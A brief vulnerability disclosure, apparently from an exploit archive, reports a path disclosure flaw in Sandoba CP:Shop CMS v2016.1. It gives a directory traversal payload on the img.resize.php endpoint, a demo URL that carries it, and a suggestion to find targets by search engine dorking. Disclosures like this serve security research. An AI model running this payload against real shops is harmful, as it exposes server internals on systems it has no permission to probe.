==================================================================================================================================== | # Title : Sandoba CP:Shop CMS v2016.1 Path Disclosure vulnerability | | # Author : indoushka | | # Telegram : @indoushka | | # Tested on : windows 10 Français V.(Pro) | | # Version : v2016.1 | | # Vendor : https://www.sandoba.de/produkte/shop-software-cpshop/ | | # Dork : | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine [+] Use Payload: img.resize.php?path=../ https://www.shop-test.com/demoversion/img.resize.php?path=../ Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* hyp3rlinx * SymbianSyMoh * Zigoo0 | | =======================================================================================================================================